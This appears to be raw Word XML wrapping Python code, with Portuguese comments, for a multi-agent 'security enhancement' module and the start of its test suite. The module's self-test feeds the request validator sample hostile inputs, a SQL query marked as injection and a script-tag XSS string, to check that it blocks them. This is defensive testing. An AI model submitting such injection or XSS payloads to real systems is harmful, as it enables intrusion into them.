      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🧹</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Limpeza concluída: {deleted_count} eventos antigos removidos")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8E6E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63756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deleted_count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440DC7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F9D87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shutdown(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395952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"""Encerra sistema de segurança"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C671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self.audit_logger.stop_processing()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F63D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🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Sistema de segurança encerrado")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB12B45" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DD5CEEF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E7081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__name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2A29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# Teste do sistema de segurança</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359074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security_system = SecurityEnhancementSystem()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E2A1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E5CAF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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BD50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print("</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Sistema de segurança iniciado")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB991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31D71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Simular algumas requisições</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA0A7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test_requests = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3412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{"agent_id": "test_001", "message": "Hello world"},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A38A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{"agent_id": "test_002", "message": "SELECT * FROM users"},  # SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F6DE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{"agent_id": "test_003", "message": "&lt;script&gt;alert('xss')&lt;/script&gt;"},  # XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECFC9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{"agent_id": "valid_agent", "message": "Normal message"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54741D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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A584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9D036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i, request_data in enumerate(test_requests):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B9CC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valid, message = security_system.validate_request(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DBF1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request_data,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DB42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f"192.168.1.{i+1}",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579D46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"TestAgent/1.0",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B89C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"/api/test"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104FC6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5F7C28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print(f"Requisição {i+1}: {'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V</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>á</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>lida' if valid else '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Bloqueada'} - {message}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39342F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21BCF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Aguardar processamento</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEC9D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time.sleep(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535F6F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F52EC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Obter dados do dashboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4A3F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dashboard_data = security_system.get_security_dashboard_data()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7326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print(f"\n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DASHBOARD DE SEGURANÇA:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAB53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print(f"Total de eventos: {dashboard_data['security_summary']['total_events_24h']}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DABB0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print(f"Eventos bloqueados: {dashboard_data['security_summary']['blocked_events_24h']}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8C97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print(f"Cache hit rate: {dashboard_data['performance_metrics']['cache']['hit_rate']:.2%}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A06B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F5179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except KeyboardInterrupt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AABB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print("\n</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🛑</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Interrompido pelo usuário")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E27D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finally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4016E2" w14:textId="273134A6" w:rsid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security_system.shutdown()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7540B06E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7738F596" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35ED54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comprehensive_test_suite.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9871D4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF"/>
    <w:p w14:paraId="56D6E66F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D53230B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🧪</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUNA-ALSHAM Comprehensive Test Suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497413FE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>Suite de testes completa para validação do sistema multi-agente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052FDD8E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF"/>
    <w:p w14:paraId="185341BE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>FUNCIONALIDADES:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0DCF7E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Testes de comunicação inter-agentes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DDFAD4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Testes de coordenação e orquestração</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEC59A0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Testes de performance e escalabilidade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39373B52" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Testes de segurança e validação</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EB9DB8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Testes de IA e auto-evolução</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680E6905" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Testes de monitoramento em tempo real</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDFC21B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Relatórios científicos com métricas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22263EC2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30424DC0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF"/>
    <w:p w14:paraId="7AAD9E35" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>import asyncio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719B40D3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>import json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C12DC4E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9A8DB4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>import uuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063B057D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>import logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214E50BF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>import unittest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547C7C0A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>import threading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AF5E81" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>import statistics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C950A8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5628160C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>from datetime import datetime, timedelta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE29C1B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>from typing import Dict, Any, List, Optional, Tuple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428B982B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>from dataclasses import dataclass, asdict</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005973BB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>import numpy as np</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B972B4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>import scipy.stats as stats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F72057D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>from concurrent.futures import ThreadPoolExecutor, as_completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744940B2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>import psutil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3943E4BD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAAF076" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D7DBD9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF"/>
    <w:p w14:paraId="2819ECC6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t># Configurar logging para testes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059D32B6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAF2E3B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>logger = logging.getLogger(__name__)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8D7D87" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF"/>
    <w:p w14:paraId="281573B2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>@dataclass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A042A5C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>class TestResult:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD9FC30" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    """Resultado de um teste individual"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01ACA571" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    test_name: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57539805" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    status: str  # "PASS", "FAIL", "SKIP"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFBEBF5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    duration: float</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2797F551" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    details: Dict[str, Any]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAAD9B4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    timestamp: datetime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346E877D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    error_message: Optional[str] = None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5089A0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF"/>
    <w:p w14:paraId="1FBC6FFB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>@dataclass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B20B425" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>class TestSuiteReport:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ABBF9D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    """Relatório completo da suite de testes"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E2D182" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    suite_name: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038C6283" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    total_tests: int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BABFFDA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    passed_tests: int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508313E1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    failed_tests: int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9E75BB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    skipped_tests: int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D175C5B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    total_duration: float</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543EC53B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    coverage_percentage: float</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07214ECA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    performance_metrics: Dict[str, Any]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D85382" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    test_results: List[TestResult]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D085793" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    timestamp: datetime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041488D5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    system_info: Dict[str, Any]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D21278" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF"/>
    <w:p w14:paraId="701B5D2F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>class NetworkCommunicationTester:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D2BAE0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    """Testa comunicação entre agentes"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0358054F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D06AAF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    def __init__(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7099A43F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        self.results = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513EFB93" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78460573" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    async def test_message_bus_communication(self) -&gt; TestResult:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314BFED2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """Testa comunicação básica do MessageBus"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7B8373" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        start_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6E9F5A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE431F7" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5D8448" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            # Simular criação de MessageBus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A896CD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            from multi_agent_network import MessageBus, AgentMessage, MessageType, Priority</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BADE561" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194588D8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            message_bus = MessageBus()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9F73CE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2A5531" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            # Teste de envio de mensagem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26130AD9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            test_message = AgentMessage(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4393FCB3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                id=str(uuid.uuid4()),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F523F03" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                sender_id="test_sender",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314823B7" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                receiver_id="test_receiver",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378F0437" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                message_type=MessageType.REQUEST,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A17891" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                content={"test": "data"},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419B0A33" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                priority=Priority.NORMAL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E310DA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                timestamp=datetime.now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690A8297" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            )</w:t>
      </w:r>
    </w:p>
